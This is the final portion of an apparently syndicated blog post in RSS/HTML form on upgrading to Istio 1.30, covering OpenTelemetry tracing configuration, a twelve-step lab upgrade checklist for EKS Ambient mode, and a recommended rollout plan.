&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The two most likely to bite are (a) &lt;strong&gt;XDS debug auth becoming default&lt;/strong&gt;, which can suddenly 401 internal tools that call &lt;code&gt;istioctl … --plaintext&lt;/code&gt;, and (b) &lt;strong&gt;sidecar hostname matching order flipping&lt;/strong&gt;, which can quietly reroute traffic in environments where the same hostname is served by both a Kubernetes &lt;code&gt;Service&lt;/code&gt; and a &lt;code&gt;ServiceEntry&lt;/code&gt;. The latter has a clean revert path via &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt; while you plan the actual migration.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. OpenTelemetry Semantic Conventions alignment — telemetry migration
&lt;/h2&gt;

&lt;p&gt;Final move: 1.30 aligns Istio's trace span attributes to the &lt;strong&gt;OpenTelemetry Kubernetes service attributes spec&lt;/strong&gt;. With &lt;code&gt;serviceAttributeEnrichment: OTEL_SEMANTIC_CONVENTIONS&lt;/code&gt; set on &lt;code&gt;OpenTelemetryTracingProvider&lt;/code&gt;, Istio derives &lt;code&gt;service.name&lt;/code&gt;, &lt;code&gt;service.namespace&lt;/code&gt;, &lt;code&gt;service.version&lt;/code&gt;, and &lt;code&gt;service.instance.id&lt;/code&gt; via the OTel fallback chain.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;install.istio.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;IstioOperator&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;istio-system&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;istio-control&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;meshConfig&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;extensionProviders&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;otel-collector&lt;/span&gt;
      &lt;span class="na"&gt;opentelemetry&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;opentelemetry-collector.observability.svc&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4317&lt;/span&gt;
        &lt;span class="na"&gt;serviceAttributeEnrichment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;OTEL_SEMANTIC_CONVENTIONS&lt;/span&gt;  &lt;span class="c1"&gt;# ← 1.30&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;telemetry.istio.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Telemetry&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tracing-egress-no-propagation&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;egress&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;tracing&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;providers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;otel-collector&lt;/span&gt;
    &lt;span class="na"&gt;randomSamplingPercentage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;100.0&lt;/span&gt;
    &lt;span class="na"&gt;disableContextPropagation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# ← 1.30: stop trace context leaking to external services&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;source_app&lt;/code&gt; / &lt;code&gt;destination_app&lt;/code&gt; metric labels previously depended on the &lt;code&gt;app&lt;/code&gt; label. From 1.30 they fall back to &lt;code&gt;app.kubernetes.io/name&lt;/code&gt;, then &lt;code&gt;service.istio.io/canonical-name&lt;/code&gt;. Teams that standardized on Helm/Kustomize/Argo CD labels without an explicit &lt;code&gt;app&lt;/code&gt; label finally get populated metrics out of the box.&lt;/p&gt;

&lt;h2&gt;
  
  
  9. Lab upgrade checklist (EKS 1.33 + Ambient)
&lt;/h2&gt;

&lt;p&gt;Below is the validation sequence we ran on a lab cluster (&lt;em&gt;EKS 1.33, Ambient mode, two networks, 7 ztunnel nodes, 3 waypoints&lt;/em&gt;) upgrading from 1.29.2 → 1.30.0.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Command / action&lt;/th&gt;
&lt;th&gt;Expected outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;istioctl pre-check&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;istioctl analyze --all-namespaces&lt;/code&gt; + check for IST0175&lt;/td&gt;
&lt;td&gt;Identify workloads missing &lt;code&gt;BLOCKED_CIDRS_IN_JWKS_URIS&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;JWKS / RequestAuthentication&lt;/td&gt;
&lt;td&gt;Audit &lt;code&gt;RequestAuthentication&lt;/code&gt; resources, especially external IdP &lt;code&gt;jwksUri&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Fallback paths covered by 1.30 patch&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;XDS debug tooling&lt;/td&gt;
&lt;td&gt;grep internal tools using &lt;code&gt;istioctl proxy-status --plaintext&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Switch to authenticated/mTLS access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;AuthorizationPolicy regex&lt;/td&gt;
&lt;td&gt;Search &lt;code&gt;source.principals&lt;/code&gt; / &lt;code&gt;source.namespaces&lt;/code&gt; for metacharacters&lt;/td&gt;
&lt;td&gt;Zero unintended wildcard matches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;CNI permissions&lt;/td&gt;
&lt;td&gt;&lt;code&gt;stat /etc/cni/net.d/15-istio-cni.conf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0600; flip &lt;code&gt;CNI_CONF_GROUP_READ=true&lt;/code&gt; only if needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Ambient CIDR ServiceEntry&lt;/td&gt;
&lt;td&gt;Collapse legacy VM-pool &lt;code&gt;ServiceEntry&lt;/code&gt; resources to CIDR form&lt;/td&gt;
&lt;td&gt;ztunnel longest-prefix-match routing works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Waypoint XFCC&lt;/td&gt;
&lt;td&gt;Annotate waypoint Gateway with &lt;code&gt;ambient.istio.io/xfcc-include-client-identity: "true"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Upstream apps log SPIFFE-derived XFCC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;HBONE window sizes&lt;/td&gt;
&lt;td&gt;Tune &lt;code&gt;PILOT_HBONE_INITIAL_STREAM_WINDOW_SIZE&lt;/code&gt; on hot waypoints&lt;/td&gt;
&lt;td&gt;Compare throughput and p99 latency before / after&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;OTel Semantic Conventions&lt;/td&gt;
&lt;td&gt;Enable &lt;code&gt;serviceAttributeEnrichment: OTEL_SEMANTIC_CONVENTIONS&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Tempo/Jaeger spans show aligned &lt;code&gt;service.name&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;AWS EKS Branch ENI&lt;/td&gt;
&lt;td&gt;Measure kubelet probe success on Ambient pods using Security Groups for Pods&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;AMBIENT_ENABLE_AWS_BRANCH_ENI_PROBE&lt;/code&gt; on by default; failed probes disappear&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Helm v4 upgrade&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;helm upgrade istio-base istio/base --version 1.30.0&lt;/code&gt; (SSA)&lt;/td&gt;
&lt;td&gt;Zero &lt;code&gt;failurePolicy&lt;/code&gt; ownership conflicts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Rollback rehearsal&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt; to restore sidecar hostname-matching&lt;/td&gt;
&lt;td&gt;Legacy routing restored immediately; staged re-migration plan written&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. The new default the release sets
&lt;/h2&gt;

&lt;p&gt;Istio 1.30 lands as a &lt;strong&gt;security major + future data plane + operational automation&lt;/strong&gt; release in one shot. The four CVEs are &lt;em&gt;patch-now&lt;/em&gt; work. Agentgateway, the &lt;code&gt;TrafficExtension&lt;/code&gt; API, and Ambient's CIDR &lt;code&gt;ServiceEntry&lt;/code&gt; are &lt;em&gt;plan-the-rest-of-2026&lt;/em&gt; work. A reasonable rollout shape: (1) patch every supported track (1.28.7 / 1.29.3 / 1.30.0) within a week; (2) enable &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt; for one week to regression-test the sidecar hostname-matching change before flipping it back on; (3) on Ambient clusters, use CIDR &lt;code&gt;ServiceEntry&lt;/code&gt; and XFCC synthesis to clean up the legacy &lt;code&gt;ServiceEntry&lt;/code&gt; inventory; (4) if there's an isolated AI gateway in the topology, move one route at a time onto the &lt;code&gt;istio-agentgateway&lt;/code&gt; &lt;code&gt;GatewayClass&lt;/code&gt; to start collecting regression data. The service mesh is no longer just "microservice routing + mTLS" — 1.30 makes it the control point for AI traffic, multi-network topology, OpenTelemetry alignment, and Zero-Trust debug channels at the same time.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally published in Korean at &lt;a href="https://www.manoit.co.kr/forum/view/1475485" rel="noopener noreferrer"&gt;manoit.co.kr&lt;/a&gt;. It was co-authored by ManoIT engineering and Anthropic Claude (Opus 4.6). Official sources used: Istio 1.30 release notes, change notes, upgrade notes, and the linked CVE advisories on the National Vulnerability Database.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1475485" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>security</category>
      <category>observability</category>
      <category>servicemesh</category>
    </item>
  </channel>
</rss>
